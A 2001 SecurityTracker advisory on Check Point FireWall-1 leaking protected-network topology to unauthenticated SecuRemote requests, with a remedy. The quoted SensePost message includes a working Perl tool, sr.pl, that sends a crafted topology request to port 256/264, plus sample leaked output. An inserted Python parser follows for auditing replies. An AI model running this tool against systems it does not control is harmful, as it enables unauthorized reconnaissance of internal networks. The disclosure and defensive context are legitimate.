SecurityTracker
Archives
Category:   Application (Firewall)  >   FireWall-1/VPN-1
Vendors:   Check Point
Check Point FireWall-1 May Disclose Protected Network Topology to Remote Users in Certain Configurations
SecurityTracker Alert ID:  1002039
SecurityTracker URL:  http://securitytracker.com/id/1002039
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jul 18 2001
Impact:   Disclosure of system information
Exploit Included:  Yes  
Version(s): see the alert text below
Description:   A vulnerability has been reported in Check Point FireWall-1 that allows remote users to obtain a network topology of the protected network in certain configurations when SecuRemote is used.

When the Policy Properties "respond to unauthenticated topology requests" option is checked, the firewall will provide a network topology of the protected network to the SecuRemote remote firewall access client. The firewall will also provide this information to remote users that request it (some demonstration exploit code is included in the Source Message).

Prior to 4.1SP1 (CP2000), the default policy apparently was to automatically respond to unauthenticated topology downloads. In more recent versions, the option must be explicitly enabled. This vulnerable option is reportedly required to use FWZ encryption for SecuRemote.

The following exploit transcript demonstrates the type of information that is available, including IP addresses and network masks.

SensePost# perl sr.pl firewall.victim.com
Testing on port 256
:val (
:reply (
: (-SensePost-dotcom-.hal9000-19.3.167.186
:type (gateway)
:is_fwz (true)
:is_isakmp (true)
:certificates ()
:uencapport (2746)
:fwver (4.1)
:ipaddr (19.3.167.186)
:ipmask (255.255.255.255)
:resolve_multiple_interfaces ()
:ifaddrs (
: (16.3.167.186)
: (12.20.240.1)
: (16.3.170.1)
: (29.203.37.97)
)
:firewall (installed)
:location (external)
:keyloc (remote)
:userc_crypt_ver (1)
:keymanager (
:type (refobj)
:refname ("#_-SensePost-dotcom-")

) :name
(-SensePost-dotcom-Neo16.3.167.189)
:type (gateway)
:ipaddr (172.29.0.1)
:ipmask (255.255.255.255)
)
--snip--
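The reply above is a nested ":key (value)" listing. As an added example that is not part of the advisory or of SensePost's tool, the following Python parses a constructed reply in that format and lists the addresses and masks it exposes, which is what an administrator auditing their own firewall's response would want to see; the sample text and field handling are assumptions drawn from the transcript only.

```python
import re

# Constructed sample, trimmed from the reply format in the advisory transcript
# (same field names and addresses; a real reply is longer and may be snipped).
SAMPLE_REPLY = """\
:val (
  :reply (
    : (-SensePost-dotcom-.hal9000-19.3.167.186
      :ipaddr (19.3.167.186)
      :ipmask (255.255.255.255)
      :ifaddrs (
        : (16.3.167.186)
        : (12.20.240.1)
        : (16.3.170.1)
        : (29.203.37.97)
      )
      :refname ("#_-SensePost-dotcom-")
      :name (-SensePost-dotcom-Neo16.3.167.189)
      :ipaddr (172.29.0.1)
      :ipmask (255.255.255.255)
    )
"""
TOKEN = re.compile(r'\(|\)|:[\w-]*|"[^"]*"|[^\s()]+')
IPV4 = re.compile(r'^\d{1,3}(?:\.\d{1,3}){3}$')

def parse(text):
    """Turn the ':key (value)' nesting into (key, value) pairs; a value is a
    string or a nested list. EOF closes any list left open by '--snip--'."""
    tok = TOKEN.findall(text)
    def plist(i):
        items = []
        while i < len(tok) and tok[i] != ')':
            if tok[i].startswith(':'):              # ':key value' or ': value'
                key, (val, i) = tok[i][1:], pvalue(i + 1)
                items.append((key, val))
            else:                                   # bare atom (gateway name)
                items.append(tok[i]); i += 1
        return items, i + 1
    def pvalue(i):
        if i < len(tok) and tok[i] == '(':
            return plist(i + 1)
        return (tok[i] if i < len(tok) else ''), i + 1
    return plist(0)[0]

def exposed_addresses(tree):
    """IPv4 values revealed under ipaddr / ipmask / ifaddrs, by field name."""
    found = {"ipaddr": set(), "ipmask": set(), "ifaddrs": set()}
    def walk(items, under=None):
        for item in items:
            key, val = item if isinstance(item, tuple) else (under, item)
            if isinstance(val, list):
                walk(val, key if key in found else under)
            elif key in found and IPV4.match(val):
                found[key].add(val)
    walk(tree)
    return found
```

Run against a reply captured from your own gateway, a non-empty result means the "respond to unauthenticated topology requests" option is still exposing internal addressing.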

Impact:   A remote user can obtain information about the protected network when SecuRemote is enabled and, for versions 4.1SP1 and later, when the "respond to unauthenticated topology requests" option is enabled.
Solution:   Upgrade to 4.1SP1 or later and uncheck the "respond to unauthenticated topology requests" option in the Policy Properties.
Vendor URL:  www.checkpoint.com/techsupport/alerts/
Cause:   Configuration error
Underlying OS:  Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), Windows (NT), Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Additional Details) Re: Check Point FireWall-1 May Disclose Protected Network Topology to Remote Users in Certain Configurations
A user provides some additional details.



 Source Message Contents

Subject:  RE: Firewall-1 Information leak

Checkpoint Firewall-1 makes use of a piece of software called SecureRemote
to create encrypted sessions between users and FW-1 modules. Before remote
users are able to communicate with internal hosts, a network topology of
the protected network is downloaded to the client. While newer versions of
the FW-1 software have the ability to restrict these downloads to only
authenticated sessions, the default setting allows unauthenticated
requests to be honoured. This gives a potential attacker a wealth of
information including ip addresses, network masks (and even friendly
descriptions).

The attached file will connect to the firewall, and download the
topology (if SecureRemote is running).
(it is a tiny perl file, which needs only Socket, so avoids the hassle of
having to install the SecureRemote client <or booting windows> to test a
firewall-1) 

--snip--
SensePost# perl sr.pl firewall.victim.com
Testing  on port 256
        :val (
                :reply (
                        : (-SensePost-dotcom-.hal9000-19.3.167.186
                                :type (gateway)
                                :is_fwz (true)
                                :is_isakmp (true)
                                :certificates ()
                                :uencapport (2746)
                                :fwver (4.1)
                                :ipaddr (19.3.167.186)
                                :ipmask (255.255.255.255)
                                :resolve_multiple_interfaces ()
                                :ifaddrs (
                                        : (16.3.167.186)
                                        : (12.20.240.1)
                                        : (16.3.170.1)
                                        : (29.203.37.97)
                                )
                                :firewall (installed)
                                :location (external)
                                :keyloc (remote)
                                :userc_crypt_ver (1)
                                :keymanager (
                                        :type (refobj)
                                        :refname ("#_-SensePost-dotcom-")

)                               :name
                                (-SensePost-dotcom-Neo16.3.167.189)
                                                :type (gateway)
                                                :ipaddr (172.29.0.1)
                                                :ipmask (255.255.255.255)
                                        )
        
--snip-- 

Haroon Meer
+27 837866637
haroon@sensepost.com
http://www.sensepost.com


[Editor's Note:  The following encoded file has been decoded
 for your convenience.]

#!/usr/bin/perl
# A command-line tool that can be used to download the network topology
# from a Firewall-1 running SecureRemote with the option "Allow
# unauthenticated cleartext topology downloads" enabled.
# Usage: sr.pl IP
# Haroon Meer & Roelof Temmingh 2001/07/17
# haroon@sensepost.com - http://www.sensepost.com

use strict;
use warnings;
use Socket;

if ($#ARGV < 0) { die "Usage: sr.pl IP\n"; }

my $host   = $ARGV[0];
my $port   = 256;                      # topology port; 264 is tried as a fallback below
my $target = inet_aton($host) || die "Cannot resolve $host\n";
print "Testing $host on port $port\n";

# Pre-built request, hex-encoded; the payload carries a cleartext
# "(topology-request" block with a :caname and a :challenge field.
my $SENDY = "410000000259052100000004c41e43520000004e28746f706f6c6f67792d726571756573740a093a63616e616d6520282d53656e7365506f73742d646f74636f6d2d290a093a6368616c6c656e67652028633265323331383339643066290a290a00";
$SENDY = pack("H*", $SENDY);

my @results = sendraw($SENDY);

if (!@results) {
  print "No results on port 256 - trying 264\n";
  $port = 264;
  @results = sendraw($SENDY);
  if (!@results) { die "Sorry - no results\n"; }
}
print @results;

# Connect to $target:$port over TCP, send the request and return every
# line of the reply. Returns an empty list if the connection fails.
sub sendraw {
  my ($pstr) = @_;
  socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) || die("Socket problems\n");
  if (connect(S, sockaddr_in($port, $target))) {
    my @in;
    select(S); $| = 1; print $pstr;
    while (<S>) { push @in, $_; }
    select(STDOUT); close(S); return @in;
  } else { return (); }
}
# Spidermark: sensepostdata fw1
Copyright 2021, SecurityGlobal.net LLC